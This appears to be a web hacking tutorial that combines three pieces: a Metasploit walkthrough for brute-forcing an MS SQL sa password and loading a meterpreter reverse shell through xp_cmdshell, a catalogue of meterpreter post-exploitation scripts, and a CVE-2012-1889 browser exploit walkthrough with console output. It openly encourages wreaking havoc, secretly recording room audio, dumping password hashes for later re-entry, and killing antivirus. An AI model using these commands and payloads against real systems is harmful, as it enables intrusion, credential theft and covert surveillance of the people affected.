How to Hack Databases: Cracking SQL Server Passwords & Owning the Server
In this tutorial, we'll look at how we can crack the password on the system admin (sa) account on the database, install a meterpreter payload through calling the stored procedure xp_cmdshell, and wreak havoc on their system.
Step 1: Start Metasploit
First, we need to start Metasploit.
Once we have the metasploit command prompt, we need to define which module we want to use. In past Metasploit tutorials, we've always used exploits, but this one is a bit different. Instead, we will use a scanner among the auxiliary modules that enables us to brute force the sa password. Let's load up mssql_login:
use scanner/mssql/mssql_login
As
you can see, Metasploit responds by telling us we have successfully
loaded this auxiliary
module. Now let's take a look at the options with
this module.
show options
Step 2: Set Your Options
In order to run this MS SQL login module, we will need:
A password file,
Set the RHOSTS, and
Determine the number of THREADS we want to run.
BackTrack has a wordlist specially built for MS SQL password hacking with over 57,000 commonly used SQL passwords at /pentest/exploits/fasttrack/bin/wordlist.txt. In this case, our target is at 192.168.1.103, and we will set our THREADS to 20.
Step 3: Brute Force the Database Passwords
Now, we simply need to type exploit and it runs through password list until it finds the password for the sa account.
exploit
As
you can see, after testing over 57,000 passwords (it takes a few
minutes, so be patient), it found the password on our sa account of
"NullByte". Success! Now we have full sysadmin privileges on the database that we can hopefully convert to full system sysadmin privileges.
Step 4: Grab the xp__cmdshell
Now that we have
full sysadmin (sa) on the MS SQL database, we are going to leverage that to full system sysadmin privileges. MS SQL Server has a stored
procedure named xp_cmdshell that enables the sa account
to gain a system command shell with full system admin rights. If we can
invoke that command shell, we may be able to load the payload of our
choice on the system and own that system.
Metasploit has a exploit module named windows/mssql/mssqlpayload that attempts to do this. Let's load it.
use windows/mssql/mssql_payload
Now, let's check the options for this exploit:
show options
In this case, we will try to load the meterpreter on this system, so let's:
set PAYLOAD windows/meterpreter/reverse_tcp
In
addition, we need to set the LPORT, the LHOST, the RHOST and the
password we recovered from the sa account from above, in this case,
"NullByte".
Now, simply type exploit and if all is right with the world, we should get a meterpreter prompt.
Success! We have a meterpreter session!
Step 5: Wreak Havoc!
Now that we have the meterpreter on this system thanks to the xp_cmdshell stored procedure, we can begin to wreak havoc on this system. Take a look at my list of meterpreter scripts and let's try a few.
First,
let's turn on the microphone and listen in on the conversations of the
sysadmin and anyone else in the room. Think of it as installing a bug in
the room from the old James Bond 007 movies.
meterpreter > run sound_recorder -i 100 -l /etc
This will grab 100 segments of audio of 30 seconds, or about 50 minutes, and save it in the /etcdirectory. Of course, we can record as much audio as we want. We are only limited by hard drive space.
Step 6: Grab the Hash
Now, let's grab some
passwords so that we can log back back in whenever we please. Remember,
once we have the admin password, we can login any time with Metasploit's psexec exploit.
meterpreter > hashdump
As you can see, we were able to grab the password hashes from the system
.
Please note that new meterpreter scripts are being developed
every day. This list attempts to provide you with a complete list of
scripts as of this writing. If you find errors or typos, please feel
free to post them here, so I will try correct them as soon as humanly
possible.
Script Commands with Brief Descriptions
arp_scanner.rb - Script for performing an ARP's Scan Discovery.
autoroute.rb - Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb
- Dumplinks parses .lnk files from a user's recent documents folder and
Microsoft Office's Recent documents folder, if present. The .lnk files
contain time stamps, file locations, including share names, volume
serial #s and more. This info may help you target additional systems.
duplicate.rb
- Uses a meterpreter session to spawn a new meterpreter session in a
different process. A new process allows the session to take "risky"
actions that might get the process killed by A/V, giving a meterpreter
session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb
- Script for detecting AV, HIPS, Third Party Firewalls, DEP
Configuration and Windows Firewall configuration. Provides also the
option to kill the processes of detected products and disable the
built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb
- Script for injecting a reverce tcp Meterpreter Payload into memory of
multiple PIDs, if none is provided a notepad process will be created
and a Meterpreter Payload will be injected in to each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb
- This module exploits a privilege escalation vulnerability in Panda
Antivirus 2007. Due to insecure permission issues, a local attacker can
gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb
- Exploits a privilege escalation vulnerability in Hewlett-Packard's
PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL
permission, a local attacker can gain elevated privileges.
powerdump.rb
- Meterpreter script for utilizing purely PowerShell to extract
username and password hashes through registry keys. This script requires
you to be running as system in order to work properly. This has
currently been tested on Server 2008 and Windows 7, which installs
PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb
- This script will enumerate windows hosts in the target environment
given a username and password or using the credential under which
Meterpeter is running using WMI wmic windows native tool.
scheduleme.rb
- Script for automating the most common scheduling tasks during a
pentest. This script works with Windows XP, Windows 2003, Windows Vista
and Windows 2008.
schelevator.rb - Exploit for
Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This
script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb
- Meterpreter script for abusing the scheduler service in Windows by
scheduling and running a list of command against one or more targets.
Using schtasks command to run them as system. This script works with
Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively search and download files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb
This script attempts to create a service, then searches through a list
of existing services to look for insecure file or configuration
permissions that will let it replace the executable with a payload. It
will then attempt to restart the replaced service to run the payload. If
that fails, the next time the service is started (such as on reboot)
the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb
- Function for checking the password policy of current system. This
policy may resemble the policy of other servers in the target
environment.
winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.
CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer.
An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website.
The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can get the full list. ----------------------------------------------------------------------------------------------------------------------------------------------------------- The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. ----------------------------------------------------------------------------------------------------------------------------------------------------------- I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not.
Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole".
Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec".
Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console.
Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.
Command: set lhost 192.168.56.10
Command: set URIPATH / Details: The path in which our exploit will run.
As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp
Type "exploit" in the console.
Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console:
[*] msxml_get_definition_code_exec - Using msvcrt ROP
[*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html
[*] Sending stage (752128 bytes) to 192.168.56.12
[*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565)
Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter.
Type "sysinfo" in the meterpreter to get the system information. LIKE OUR FACEBOOK PAGE AND JOIN OUR SATE TO GET LATEsT HACKS UPDATES
